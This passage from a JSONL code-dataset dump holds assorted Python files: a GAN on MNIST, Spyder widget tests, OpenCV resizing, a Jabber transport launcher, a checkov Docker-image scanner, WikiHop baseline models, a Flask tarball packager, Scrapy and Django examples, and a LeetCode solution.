1, size=(1,100))\n\n # Generate a sample by runnning generator(z)\n gen_sample = sess.run(generator(z, reuse=True), feed_dict={z:sample_z})\n\n # Add each gen_sample ( which is an array still ) to the list!\n samples.append(gen_sample)\n\n# show me a sample image after we \"un-flatten it\"\n# samples[n].shape = the nth image in the sample list where < less epochs\nplt.imshow(samples[3].reshape(28,28))\n\n### Don't save! this is only running for a few epochs to test...\n\n''''\nsaver = tf.train.Saver(var_list = g_vars)\nnew_samples = []\n\nwith tf.Session() as sess:\n saver.restore(sess,'./models/500_epoch_model.ckpt')\n\n for x in range(5):\n sample_z = np.random.uniform(-1,1,size=(1,100))\n gen_sample = sess.run(generator(z,reuse=True),feed_dict={z:sample_z})\n\n new_samples.append(gen_sample)\n\nplt.imshow(new_samples[0].reshape(28,28))\n'''\n","sub_path":"mnist_gan.py","file_name":"mnist_gan.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"146093204","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © Spyder Project Contributors\n# Licensed under the terms of the MIT License\n#\n\n\"\"\"\nTests for findinfiles.py\n\"\"\"\n\n# Test library imports\nimport os\nimport pytest\nimport os.path as osp\nfrom pytestqt import qtbot\n\n# Local imports\nimport spyder.widgets.findinfiles\nfrom spyder.widgets.findinfiles import FindInFilesWidget\n\nLOCATION = os.path.realpath(os.path.join(os.getcwd(),\n os.path.dirname(__file__)))\n\n\ndef process_search_results(results):\n \"\"\"\n Transform result representation from the output of the widget to the\n test framework comparison representation.\n \"\"\"\n matches = {}\n for result in results.values():\n file, line, col = result\n filename = osp.basename(file)\n if filename not in matches:\n matches[filename] = []\n matches[filename].append((line, col))\n matches[filename] = sorted(matches[filename])\n return matches\n\n\n@pytest.fixture\ndef setup_findinfiles(qtbot, *args, **kwargs):\n \"\"\"Set up find in files widget.\"\"\"\n widget = FindInFilesWidget(None, *args, **kwargs)\n qtbot.addWidget(widget)\n return widget\n\n\ndef expected_results():\n results = {'spam.txt': [(1, 0), (1, 5), (3, 22)],\n 'spam.py': [(2, 7), (5, 1), (7, 12)],\n 'spam.cpp': [(2, 9), (6, 15), (8, 2), (11, 4),\n (11, 10), (13, 12)]\n }\n return results\n\n\ndef expected_case_unsensitive_results():\n results = {'spam.txt': [(1, 10)],\n 'ham.txt': [(1, 0), (1, 10), (3, 0), (4, 0),\n (5, 4), (9, 0), (10, 0)]}\n return results\n\n\ndef test_findinfiles(qtbot):\n \"\"\"Run find in files widget.\"\"\"\n find_in_files = setup_findinfiles(qtbot)\n find_in_files.resize(640, 480)\n find_in_files.show()\n assert find_in_files\n\n\ndef test_find_in_files_search(qtbot):\n \"\"\"\n Test the find in files utility by searching a string located on a set of\n known files.\n\n The #1lab_results of the test should be equal to the expected search result\n values.\n \"\"\"\n find_in_files = setup_findinfiles(qtbot)\n find_in_files.set_search_text(\"spam\")\n find_in_files.find_options.set_directory(osp.join(LOCATION, \"data\"))\n find_in_files.find()\n blocker = qtbot.waitSignal(find_in_files.sig_finished)\n blocker.wait()\n matches = process_search_results(find_in_files.result_browser.data)\n assert expected_results() == matches\n\n\ndef test_exclude_extension(qtbot):\n find_in_files = setup_findinfiles(qtbot, exclude=\"\\.py$\")\n find_in_files.set_search_text(\"spam\")\n find_in_files.find_options.set_directory(osp.join(LOCATION, \"data\"))\n find_in_files.find()\n blocker = qtbot.waitSignal(find_in_files.sig_finished)\n blocker.wait()\n matches = process_search_results(find_in_files.result_browser.data)\n files_filtered = True\n for file in matches:\n filename, ext = osp.splitext(file)\n if ext == '.py':\n files_filtered = False\n break\n assert files_filtered\n\n\ndef test_case_unsensitive_search(qtbot):\n find_in_files = setup_findinfiles(qtbot, case_sensitive=False)\n find_in_files.set_search_text('ham')\n find_in_files.find_options.set_directory(osp.join(LOCATION, \"data\"))\n find_in_files.find()\n blocker = qtbot.waitSignal(find_in_files.sig_finished)\n blocker.wait()\n matches = process_search_results(find_in_files.result_browser.data)\n print(matches)\n assert expected_case_unsensitive_results() == matches\n\n\ndef test_case_sensitive_search(qtbot):\n find_in_files = setup_findinfiles(qtbot)\n find_in_files.set_search_text('HaM')\n find_in_files.find_options.set_directory(osp.join(LOCATION, \"data\"))\n find_in_files.find()\n blocker = qtbot.waitSignal(find_in_files.sig_finished)\n blocker.wait()\n matches = process_search_results(find_in_files.result_browser.data)\n print(matches)\n assert matches == {'ham.txt': [(9, 0)]}\n\n\nif __name__ == \"__main__\":\n pytest.main()\n","sub_path":"lib/python2.7/site-packages/spyder/widgets/tests/test_findinfiles.py","file_name":"test_findinfiles.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"59114084","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('testimg1.jpg')\n# cv2.imshow('bolt.jpg', img)\n# cv2.waitKey(0)\n\nwidth = img.shape[1]\nheight = img.shape[0]\n\nprint(\"width: %d\\nheight: %d\\n\"%(width, height))\n\n# while resizing an image we need tp keep aspect ratio of the image\n# aspect ratio is the relationship of the width and height of the image\n\n\"\"\"\n\twe define the new image width to be 500 pixels to compute new\n\theight we multiply the old height width aspect ratio r\n\tnew_height = old_height*r\n\"\"\"\nr = 500/img.shape[1]\ndim = (500, int(r*img.shape[0]))\n\nresimg = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\nprint(\"new widht: %d\\nnew_height: %d\\n\"%(resimg.shape[1], resimg.shape[0]))\ncv2.imwrite('resimg1.jpg', resimg)\ncv2.imshow('resizeimg.jpg', resimg)\ncv2.waitKey(0)\n\n\n# MAIN PROCESSING : HOG FEATURES RECOGNIZATION\n\nnew_img = cv2.imread('resimg1.jpg')\nnew_img = np.float32(new_img)/255.0\n\n# calculate gradient\n\ngx = cv2.Sobel(new_img, cv2.CV_32F,1,0, ksize=1)\ngy = cv2.Sobel(new_img, cv2.CV_32F,0,1, ksize=1)\n\n","sub_path":"hogfeature.py","file_name":"hogfeature.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"229156111","text":"#!/usr/bin/python\n# J2J - Jabber-To-Jabber component\n# http://JRuDevels.org\n# http://wiki.JRuDevels.org\n#\n# copyright 2007 Dobrov Sergey aka Binary from JRuDevels\n#\n# License: GPL-v3\n#\nimport getopt\nimport os\nimport sys\n\nfrom twisted.words.protocols.jabber import component\nfrom twisted.internet import reactor\nfrom twisted.scripts import _twistd_unix as twistd\n\nfrom ossignal import install_shutdown_handlers\nfrom config import Config\nimport j2j\n\ndef main():\n __all__ = ['j2j', 'client', 'database', 'roster',\n 'utils', 'adhoc', 'debug', 'config']\n revision = 0\n date = 0\n\n __id__ = \"$Id$\"\n\n try:\n modRev = int(__id__.split(\" \")[2])\n modDate = int(__id__.split(\" \")[3].replace(\"-\",\"\"))\n except:\n modRev = 0\n modDate = 0\n\n if modRev > revision:\n revision = modRev\n if modDate > date:\n date = modDate\n\n for modName in __all__:\n module = __import__(modName, globals(), locals())\n try:\n modRev = int(module.__id__.split(\" \")[2])\n modDate = int(module.__id__.split(\" \")[3].replace(\"-\",\"\"))\n except:\n modRev = 0\n modDate = 0\n if modRev > revision:\n revision = modRev\n if modDate > date:\n date = modDate\n\n if revision == 0:\n revision = ''\n else:\n revision = '.r' + str(revision)\n if date != 0:\n date = str(date)\n revision = revision+\" %s-%s-%s\" % (date[:4], date[4:6], date[6:8])\n\n version = \"1.2.10\" + revision\n\n from optparse import OptionParser\n parser = OptionParser(version=\n \"Jabber-To-Jabber component version:\" + version)\n parser.add_option('-c', '--config', metavar='FILE', dest='configFile',\n help=\"Read config from custom file\")\n parser.add_option('-b', '--background', dest='configBackground',\n help=\"Daemonize/background transport\",\n action=\"store_true\")\n (options,args) = parser.parse_args()\n configFile = options.configFile\n configBackground = options.configBackground\n\n if configFile:\n config = Config(configFile)\n else:\n config = Config()\n if configBackground and os.name == \"posix\": # daemons supported?\n twistd.daemonize() # send to background\n if config.PROCESS_PID:\n pid = str(os.getpid())\n pidfile = open(config.PROCESS_PID, \"w\")\n pidfile.write(\"%s\\n\" % pid)\n pidfile.close()\n\n c = j2j.J2JComponent(reactor, version, config, config.JID)\n f = component.componentFactory(config.JID,config.PASSWORD)\n connector = component.buildServiceManager(config.JID, config.PASSWORD,\n \"tcp:%s:%s\" % (config.HOST, config.PORT))\n c.setServiceParent(connector)\n connector.startService()\n install_shutdown_handlers(c.shuttingDown)\n reactor.run(installSignalHandlers=False)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"166026547","text":"# Create a SQLite3 database and table\n\nimport sqlite3\n\nwith sqlite3.connect(\"new.db\") as connection: # connects to existing database (\"new.db\")\n\tc = connection.cursor() # creates cursor object to execute SQL commands\n\n\tcities = [ # create python list of rows to be inserted\n\t\t\t('Boston', 'MA', 600000),\n\t\t\t('Los Angeles', 'CA', 38000000),\n\t\t\t('Houston', 'TX', 2100000),\n\t\t\t('Philadelphia', 'PA', 1500000),\n\t\t\t('San Antonio', 'TX', 1400000),\n\t\t\t('San Diego', 'CA', 130000),\n\t\t\t('Dallas', 'TX', 1200000),\n\t\t\t('San Jose', 'CA', 900000),\n\t\t\t('Jacksonville', 'FL', 800000),\n\t\t\t('Indianapolis', 'IN', 800000),\n\t\t\t('Austin', 'TX', 800000),\n\t\t\t('Detroit', 'MI', 700000)\n\t\t \t]\n\n\tc.execute(\"\"\"CREATE TABLE IF NOT EXISTS population (city TEXT, state TEXT, population INT)\"\"\")\n\tc.executemany('INSERT INTO population VALUES(?, ?, ?)', cities) # insert entire list\n\n#connection.close() # close database connection\n\n\n\n","sub_path":"sqlc.py","file_name":"sqlc.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"300654181","text":"import logging\nimport subprocess # nosec\nfrom typing import Union, Dict, Any\n\nimport docker\nimport json\nimport os\nimport time\n\nfrom checkov.common.bridgecrew.vulnerability_scanning.integrations.docker_image_scanning import docker_image_scanning_integration\n\nTWISTCLI_FILE_NAME = 'twistcli'\nDOCKER_IMAGE_SCAN_RESULT_FILE_NAME = 'docker-image-scan-results.json'\n\n\ndef _get_docker_image_name(docker_image_id: str) -> str:\n try:\n docker_client = docker.from_env()\n return docker_client.images.get(docker_image_id).attrs['RepoDigests'][0].split('@')[0]\n except Exception as e:\n logging.error(\"docker image needs to have repository\")\n raise e\n\n\ndef _get_dockerfile_content(dockerfile_path: Union[str, \"os.PathLike[str]\"]) -> str:\n try:\n with open(dockerfile_path) as f:\n return f.read()\n except FileNotFoundError as e:\n logging.error(f\"Path to Dockerfile is invalid\\n{e}\")\n raise e\n except Exception as e:\n logging.error(f\"Failed to read Dockerfile content\\n{e}\")\n raise e\n\n\nclass ImageScanner:\n def __init__(self) -> None:\n self.docker_image_name = ''\n self.dockerfile_content = ''\n\n def setup_scan(\n self,\n docker_image_id: str,\n dockerfile_path: Union[str, \"os.PathLike[str]\"],\n skip_extract_image_name: bool,\n ) -> None:\n try:\n if skip_extract_image_name:\n # Provide a default image name in case the image has not been tagged with a name\n self.docker_image_name = f'repository/image{str(time.time() * 1000)}'\n else:\n self.docker_image_name = _get_docker_image_name(docker_image_id)\n self.dockerfile_content = _get_dockerfile_content(dockerfile_path)\n\n if not os.path.exists(TWISTCLI_FILE_NAME):\n docker_image_scanning_integration.download_twistcli(TWISTCLI_FILE_NAME)\n except Exception as e:\n logging.error(f\"Failed to setup docker image scanning\\n{e}\")\n raise e\n\n @staticmethod\n def cleanup_scan() -> None:\n os.remove(TWISTCLI_FILE_NAME)\n logging.info('twistcli file removed')\n\n @staticmethod\n def run_image_scan(docker_image_id: str) -> Dict[str, Any]:\n command = f\"./{TWISTCLI_FILE_NAME} images scan --address {docker_image_scanning_integration.get_proxy_address()} --token {docker_image_scanning_integration.get_bc_api_key()} --details --output-file \\\"{DOCKER_IMAGE_SCAN_RESULT_FILE_NAME}\\\" {docker_image_id}\"\n logging.debug(f\"TwistCLI: {command}\")\n subprocess.run(command, check=True, shell=True) # nosec\n logging.info(f'TwistCLI ran successfully on image {docker_image_id}')\n\n with open(DOCKER_IMAGE_SCAN_RESULT_FILE_NAME) as docker_image_scan_result_file:\n scan_result = json.load(docker_image_scan_result_file)\n return scan_result\n\n def scan(self, docker_image_id: str, dockerfile_path: str, skip_extract_image_name: bool = False) -> None:\n try:\n self.setup_scan(docker_image_id, dockerfile_path, skip_extract_image_name)\n scan_result = self.run_image_scan(docker_image_id)\n docker_image_scanning_integration.report_results(\n twistcli_scan_result=scan_result,\n file_path=dockerfile_path,\n file_content=self.dockerfile_content,\n docker_image_name=self.docker_image_name,\n )\n logging.info('Docker image scanning results reported to the platform')\n self.cleanup_scan()\n except Exception as e:\n logging.error(f\"Failed to scan docker image\\n{e}\")\n raise e\n\n\nimage_scanner = ImageScanner()\n","sub_path":"checkov/common/bridgecrew/vulnerability_scanning/image_scanner.py","file_name":"image_scanner.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"27504504","text":"from SyntheticDataset.image_operations import *\nfrom SyntheticDataset.color import *\nimport math\nimport multiprocessing\nimport timeit\nimport os\n\nDATA_PATH = \"/Users/vtolpegin/github/SUAS-Competition/SyntheticDataset/data\"\nSAVE_PATH = \"/Users/vtolpegin/github/SUAS-Competition/SyntheticDataset/Generated_Full_Targets\"\nTOTAL_GENERATED_TARGETS = 500\nNUM_PICS_PER_TARGET = 10\n\ndef run_image_generator(process_number, num_pics, starting_index):\n generator = ImageGenerator(DATA_PATH, process_number=process_number)\n\n # NOTE: Only leave one of the two sets of code uncommented\n # NOTE: Uncomment the following two lines to generate polygon pics\n generator.fillPolyPics(int(num_pics), starting_index)\n generator.savePolyPicImgs(SAVE_PATH)\n\n # NOTE: Uncomment the following two lines to generate full synthetic images\n #generator.generate_synthetic_images(int(num_pics), NUM_PICS_PER_TARGET, starting_index)\n #generator.save_synthetic_images(SAVE_PATH)\n\nif __name__ == '__main__':\n cpu_count = multiprocessing.cpu_count()\n # NOTE: Uncomment the following line to make the program run single threaded\n #cpu_count = 1\n pics_per_process = (TOTAL_GENERATED_TARGETS / cpu_count) + 1\n start_time = timeit.default_timer()\n\n jobs = []\n for index in range(cpu_count):\n starting_index = index * int(pics_per_process)\n image_generation_process = multiprocessing.Process(target=run_image_generator, args=(index, pics_per_process, starting_index))\n jobs.append(image_generation_process)\n image_generation_process.start()\n\n for job in jobs:\n job.join()\n\n print(\"====================================\")\n print(\"Total number of images generated:\", len(os.listdir(os.path.join(SAVE_PATH, \"Images\"))))\n print(\"Total elapsed time (sec):\", timeit.default_timer() - start_time)\n print(\"====================================\")\n","sub_path":"SyntheticDataset/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"615870208","text":"import os\nimport time\nimport datetime\nimport importlib.resources\n\ndef decorator(old_function):\n\n def new_function(*args, **kwargs):\n name_str = old_function.__name__\n ToDayTime = str(datetime.datetime.now())\n old_return = old_function(*args, **kwargs)\n text = os.path.abspath(__file__)\n\n data = \"Time run function: \"+ ToDayTime +'\\n'+\"Name of function: \" + name_str + '\\n' + \"RETURN of function: \" + str(old_return) +\\\n '\\n' + \"*args: \"+ str(args) + '\\n' + \"Path: \" + text\n with open('DataTime2', 'w') as f:\n f.write(data)\n return new_function","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"48722285","text":"# Simple, baseline model implementations for the WikiHop & MedHop datasets.\nimport random\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\nimport fuzzy\n\nclass RandomModel(object):\n \"\"\"\n Model which randomly chooses a candidate from the list of potential candidates.\n \"\"\"\n def __init__(self):\n pass\n\n def predict(self, sample):\n return random.choice(sample.candidates)\n\n\nclass MajorityCandidatePerQueryTypeModel(object):\n \"\"\"\n Model which chooses the most common candidate for each query type/relationship.\n \"\"\"\n def __init__(self, query_candidate_frequencies):\n \"\"\"\n query_candidate_frequencies: A map of query type -> {entity -> counter}\n \"\"\"\n self.query_candidate_frequencies = query_candidate_frequencies\n\n def predict(self, sample):\n # Find the candidate with the highest frequency.\n # If we haven't seen this relationship before, just choose randomly.\n rel = sample.query.relationship\n if rel not in self.query_candidate_frequencies:\n return random.choice(sample.candidates)\n\n freqs = self.query_candidate_frequencies[rel]\n best_candidates, best_count = [], 0\n for candidate in sample.candidates:\n # Assume candidates we haven't seen before to have a frequency of 0.\n if freqs.get(candidate.text, 0) > best_count:\n best_candidates = [candidate]\n best_count = freqs.get(candidate.text, 0)\n elif best_count == freqs.get(candidate.text, 0):\n best_candidates.append(candidate)\n\n # Choose randomly with the candidates of the given frequency.\n return random.choice(best_candidates)\n\n\ndef train_majority_candidate_model(dataset):\n \"\"\"\n Train a majority candidate model by computing the per-relationship frequency scores for every candidate.\n \"\"\"\n # Not very complicated: just compute the frequency maps of candidates for each relationship type.\n query_cand_freqs = defaultdict(lambda: defaultdict(int))\n for sample in dataset:\n rel = sample.query.relationship\n query_cand_freqs[rel][sample.answer.text] += 1\n\n return MajorityCandidatePerQueryTypeModel(query_cand_freqs)\n\n\nclass MaxMentionModel(object):\n \"\"\"\n Model which returns the candidate which shows up in the support documents most frequently (after some normalization\n is applied).\n \"\"\"\n def __init__(self):\n pass\n\n def predict(self, sample):\n best_candidates, best_count = [], 0\n # Iterate through each candidate, counting how many times they occur in the support document\n # and taking the most common. If there are ties, break them randomly.\n for candidate in sample.candidates:\n count = 0\n for support in sample.supports:\n count += fuzzy.fuzzy_count(candidate.tokenized_text, support.tokenized_text)\n\n if count > best_count:\n best_candidates, best_count = [candidate], count\n elif count == best_count:\n best_candidates.append(candidate)\n\n return random.choice(best_candidates)\n\n\nclass DocumentCueModel(object):\n \"\"\"\n A model which computes cooccurence(d, c) for every candidate c; the co-occurence is the number of times\n that a given document appears in the support set of a sample where c is the answer. For inference,\n we simply take the candidate which has the highest co-occurence with any of the documents, i.e.,\n\n argmax over candidates c:\n max over supports d:\n cooccurence(c, d)\n \"\"\"\n def __init__(self, occurences):\n \"\"\"\n occurences: A map of (candidate, document) -> frequency count. The document and candidate should both be\n normalized strings.\n \"\"\"\n self.occurences = occurences\n\n def predict(self, sample):\n best_candidates, best_count = [], 0\n for candidate in sample.candidates:\n best_occurence = 0\n for document in sample.supports:\n norm_doc = document.text.lower()\n best_occurence = max(best_occurence, self.occurences.get((candidate.text, norm_doc), 0))\n\n if best_occurence > best_count:\n best_candidates, best_count = [candidate], best_occurence\n elif best_occurence == best_count:\n best_candidates.append(candidate)\n\n return random.choice(best_candidates)\n\n\ndef train_document_cue_model(dataset):\n \"\"\"\n Train a document que model (see DocumentCueModel).\n \"\"\"\n occurences = defaultdict(int)\n for sample in tqdm(dataset, desc=\"Doc. Cue Training\"):\n for support in sample.supports:\n norm_doc = support.text.lower()\n occurences[(sample.answer.text, norm_doc)] += 1\n\n return DocumentCueModel(occurences)\n","sub_path":"baseline_models.py","file_name":"baseline_models.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"405658218","text":"import numpy as np\nimport plotly\nimport plotly.graph_objs as go\nimport copy\n\n\n# return the layout to be used while plotting\ndef plot_layout():\n\n # mlen = max(robobj.initcoordmat[robobj.jointno-1])\n\n layout = go.Layout(\n scene=dict(\n xaxis=dict(range=[-6, 6],),\n yaxis=dict(range=[-6, 6],),\n zaxis=dict(range=[-6, 6],),),\n )\n return layout\n\n\ndef plot(data):\n plotly.offline.init_notebook_mode(connected=True)\n layout = plot_layout()\n fig = go.Figure(data=data, layout=layout)\n return fig\n\n\n# initialize the plot for robot arm and return a Robopos(data type)\ndef position(robobj, positionmatrix):\n\n i = 0\n initj = 0\n\n lenx = len(np.linspace(positionmatrix[i][0], positionmatrix[i+1][0]))\n x_array = np.zeros(lenx*3)\n y_array = np.zeros(lenx*3)\n z_array = np.zeros(lenx*3)\n\n while i < robobj.jointno:\n x = np.linspace(positionmatrix[i][0], positionmatrix[i+1][0])\n y = np.linspace(positionmatrix[i][1], positionmatrix[i+1][1])\n z = np.linspace(positionmatrix[i][2], positionmatrix[i+1][2])\n lenx = len(x)\n j = copy.deepcopy(initj)\n\n while j < lenx + initj:\n x_array[j] = x[j-initj]\n y_array[j] = y[j-initj]\n z_array[j] = z[j-initj]\n j = j + 1\n\n i = i + 1\n initj = copy.deepcopy(j)\n\n armvec = go.Scatter3d(\n x=x_array, y=y_array, z=z_array,\n marker=dict(\n size=2,\n ),\n line=dict(\n color='#1f77b4',\n width=1\n )\n )\n\n i = 0\n\n jointx = np.zeros(robobj.jointno + 1)\n jointy = np.zeros(robobj.jointno + 1)\n jointz = np.zeros(robobj.jointno + 1)\n\n while i < robobj.jointno + 1:\n jointx[i] = positionmatrix[i][0]\n jointy[i] = positionmatrix[i][1]\n jointz[i] = positionmatrix[i][2]\n i = i + 1\n\n joints = go.Scatter3d(\n x=jointx, y=jointy, z=jointz,\n marker=dict(\n size=5,\n ),\n line=dict(\n color='#ff7f0e',\n width=2\n )\n )\n data = [armvec, joints]\n\n return data\n\n\n# plot the current position of the robot\ndef current_position(robobj):\n data = position(robobj, robobj.coordmat)\n return data\n","sub_path":"kineticspy/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"522728916","text":"#!/usr/bin/env python\n''' app.py - main application for the package-routine-web project\n\nRuns a Flask application that runs the tool to select routines\n\nExample:\n\n$ flask run\n$ flask run --help\n\n@author: Cade Brown \n'''\n\n# flask\nimport flask\nfrom flask import Flask, request, send_file, render_template\n\n# python stdlib\nimport time\nimport io\nimport os\nimport tarfile\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index_():\n return render_template('index.html')\n\n@app.route('/list')\ndef list_():\n # returns list of valid routines\n names = []\n for full in map(lambda x: x[:x.index('.')], filter(lambda x: '.tar' in x, os.listdir('tars/cuda'))):\n names.append(full.replace('magma_', ''))\n return ','.join(names)\n\n@app.route('/get')\ndef get_():\n curtime = time.time()\n interface = request.args.get('interface', 'cuda')\n\n routines = {*filter(lambda x: x, request.args.get('routines').split(','))}\n out_name = 'magma_' + interface + '_' + '_'.join(routines) + '.tar.gz'\n\n # create in-memory buffer which is a tarfile\n out_buf = io.BytesIO()\n out_tar = tarfile.open(fileobj=out_buf, mode='w:gz')\n\n # manifest files which need to be merged instead of xor'd\n merged = {}\n\n merge_files = {key: set() for key in [\n 'FUNCS.mf',\n 'WARNINGS.mf',\n 'BLAS.mf',\n ]}\n \n # wraps as 'addfile' acceptable parameters to `tarfile.addfile`\n def wrap(fname, src):\n oi = tarfile.TarInfo(fname)\n # fill in meta data (size is required; else everything is empty!)\n oi.size = len(src)\n oi.mtime = curtime\n\n # we need to return a TarInfo and a readable IO-like object (as if a file was opened)\n return oi, io.BytesIO(src)\n\n # go through tar files for each routines\n for r in routines:\n tf = tarfile.open('tars/' + interface + '/magma_' + r + '.tar.gz')\n for fl in tf:\n # extract and read as bytes\n ef = tf.extractfile(fl)\n src = ef.read()\n if fl.name.endswith('.mf'):\n # just combine unique lines\n merged[fl.name] = merged.get(fl.name, set()) | {*src.split(b'\\n')}\n elif fl.name not in out_tar:\n # add source\n out_tar.addfile(*wrap(fl.name, src))\n\n # add merged files in as well\n for fl in merged:\n if fl not in out_tar:\n out_tar.addfile(*wrap(fl, b'\\n'.join(merged[fl])))\n\n # finish the tar file\n out_tar.close()\n\n # now, reset position so that the 'send_file' function reads it like an open file\n out_buf.seek(0)\n return send_file(out_buf, mimetype='tar', as_attachment=True, attachment_filename=out_name)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"tools/package-routine-web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"290749624","text":"from scrapy.selector import Selector\nfrom scrapy.http import HtmlResponse\n\n\nbody = '''\n\n \n

Hello world 0

\n

Hello world 1

\n Hello world 2\n\n
    \n
  • Python 价格:99.0 元
  • \n
  • R 价格:199.0 元
  • \n
  • Swift 价格:299 元
  • \n
  • Swift 价格:399 元
  • \n
\n \n\n\n'''\n\nresponse = HtmlResponse(url='htttp://www.example.com',\n body=body, encoding='utf-8')\nselector = Selector(response=response)\n\nli_selctors = selector.xpath('.//li/b/text()')\nprint(li_selctors)\n\n# 只提取价格的float 数字部分\nprices = selector.xpath('.//li/b/text()').re('\\d+\\.\\d+')\nprint(prices)\n# 提取出float和int\nprices = selector.xpath('.//li/b/text()').re('\\d*\\.?\\d+')\nprint(prices)\n\nfirst = selector.xpath('.//li/b/text()').re_first('\\d+\\.\\d+')\nprint('first=', first)\n\n","sub_path":"i00mastering_scrapy/ch3selector_extract_data/i2regex.py","file_name":"i2regex.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357902889","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\nfrom .models import Board\n\n\n\n# Create your views here.\ndef index(request):\n # Board 의 전체 데이터를 불러온다 - QuerySet\n boards = Board.objects.all()\n context = {'boards': boards}\n return render(request, 'boards/index.html', context)\n\n\n# 사용자 입력을 받는 페이지 렌터링\n@require_http_methods(['GET', 'POST'])\ndef new(request):\n # GET\n if request.method == 'GET':\n return render(request, 'boards/new.html')\n # POST\n else:\n title = request.POST.get('title')\n content = request.POST.get('content')\n board = Board(title=title, content=content)\n board.save()\n print('new board id: ', board.id)\n return redirect('boards:detail', board.id)\n\n\n# 특정 게시글 하나만 가지고 온다.\n@require_http_methods(['GET'])\ndef detail(request, id):\n # Board 클래스를 사용해서 id 값에 맞는 데이터를 가지고 온다.\n # context 로 넘겨서 detail.html 페이지에서 title 과 content 를 출력해본다.\n board = get_object_or_404(Board, id=id)\n context = {'board': board}\n return render(request, 'boards/detail.html', context)\n\n\n# 특정 게시글 삭제\n@require_http_methods(['POST']) # 허용할 request 방식을 리스트에 담음.\ndef delete(request, id): # GET 요청을 받으면 status 405 error code 를 전달\n board = get_object_or_404(Board, id=id)\n board.delete()\n return redirect('boards:index')\n\n\n# 게시글 수정 페이지 렌더링\n@require_http_methods(['GET', 'POST'])\ndef edit(request, id):\n board = get_object_or_404(Board, id=id) # DRY (Don't Repeat Yourself)\n # GET\n if request.method == 'GET':\n context = {'board': board}\n return render(request, 'boards/edit.html', context)\n # POST\n else:\n title = request.POST.get('title')\n content = request.POST.get('content')\n board.title = title\n board.content = content\n board.save()\n return redirect('boards:detail', id)\n","sub_path":"boards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"622934469","text":"class Solution:\n def thirdMax(self, nums: List[int]) -> int:\n # my initial solution, not quite get there b/c time is O(nlogn)\n nums = sorted(list(set(nums)))\n \n try:\n return nums[-3]\n except:\n return nums[-1]\n \n # https://leetcode.com/problems/third-maximum-number/discuss/90207/Intuitive-and-Short-Python-solution\n def thirdMax(self, nums: List[int]) -> int:\n lst = [-float('inf'), -float('inf'), -float('inf')]\n \n for n in nums:\n if n not in lst:\n if n > lst[0]:\n lst = [n, lst[0], lst[1]]\n elif n > lst[1]:\n lst = [lst[0], n, lst[1]]\n elif n > lst[2]:\n lst = [lst[0], lst[1], n]\n \n return lst[0] if -float('inf') in lst else lst[2]","sub_path":"LeetCode/easy - Array/414. Third Maximum Number/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"237950855","text":"from django.shortcuts import render, get_object_or_404\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom .models import Entery\r\nfrom .forms import EnteryForm\r\n\r\n\r\ndef index(request):\r\n enteries = Entery.objects.all()\r\n return render(request, 'myapp/index.html', context={'enteries': enteries})\r\n\r\n\r\ndef details(request, pk):\r\n entry = get_object_or_404(Entery, pk=pk)\r\n return render(request, \"myapp/details.html\", context={'entery': entry})\r\n\r\n\r\ndef add(request):\r\n if request.method == 'POST':\r\n form = EnteryForm(request.POST)\r\n\r\n if form.is_valid():\r\n name = form.cleaned_data['name']\r\n date = form.cleaned_data['date']\r\n description = form.cleaned_data['description']\r\n\r\n Entery.objects.create(\r\n name=name,\r\n date=date,\r\n description=description\r\n ).save()\r\n return HttpResponseRedirect('/myapp')\r\n else:\r\n form = EnteryForm()\r\n\r\n return render(request, \"myapp/form.html\", {\"form\": form})\r\n\r\n\r\ndef delete(request, pk):\r\n if request.method == 'DELETE':\r\n entery = get_object_or_404(Entery, pk=pk)\r\n entery.delete()\r\n return HttpResponseRedirect('myapp/')","sub_path":"mysite/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"605202270","text":"from __future__ import absolute_import, print_function\nimport sys\nfrom os.path import join, sep\nfrom os import 